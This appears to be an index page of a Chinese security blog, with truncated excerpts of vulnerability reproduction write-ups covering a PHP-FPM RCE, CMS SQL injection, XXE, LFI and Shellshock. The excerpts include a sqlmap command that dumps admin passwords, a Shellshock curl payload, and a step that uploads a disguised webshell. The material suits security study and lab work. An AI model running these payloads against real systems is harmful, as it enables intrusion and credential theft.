漏洞描述CVE-2019-11043 是一个远程代码执行漏洞，使用某些特定配置的 Nginx + PHP-FPM 的服务器存在漏洞，可允许攻击者远程执行代码。 在长亭科技举办的 Real World CTF 中，国外安全研究员 Andrew

熊海CMS的SQL注入以及后续的UDF提权 SQL注入后台登录界面存在sql注入，可抓包后放到sqlmap跑 可获取到管理员密码 sqlmap -r 1.txt -D isea -T manage -C name,password --du

环境搭建源码下载地址 https://github.com/joomla/joomla-cms/releases/tag/3.4.6https://downloads.joomla.org/it/cms/joomla3/3-4-6 我这

前言关于漏洞的分析请看这篇文章74cms v4.2.3前台任意文件读取，大佬分析的很详细，我这里不作分析，仅复现漏洞。 漏洞复现先尝试读取 db.php，向服务器post如下数据 POST /index.php?m=&c=membe

源代码<?php class test{ public $xcx; public $miku; function __destruct(){ $a = $this->xcx

前言XXE Injection即XML External Entity Injection,也就是XML外部实体注入攻击.漏洞是在对非安全的外部实体数据进行处理时引发的安全问题. 在XML1.0标准里,XML文档结构里定义了实体(entit

在后台添加频道处可以上传图片和附件，可以上传图片或上传以下格式的附件 图片马的制作在上篇文章说过，这里我将冰蝎马改名为shell.doc进行上传，上传后会回显文件地址。 然后将回显的文件地址填在频道模板处，在地址前面加上../../（

LFI(Local File Inclusion)本地文件包含漏洞，指的是服务器执行PHP文件时，可以通过文件包含函数加载另一个文件中的PHP代码，并且当PHP来执行，利用这个特性，配合文件上传就可以getshell。 已知服务器存在文件包

linux下可以直接使用curl进行复现，命令如下 curl -A ' () { :;};echo ; echo $(/bin/ls /);' 'http://www.*****.com/cgi-bin/poc.cg

DNSlog辅助平台 http://ceye.io 需注册 http://www.dnslog.cn/ 无需注册 查库http://www/index.php?id=1 and if((select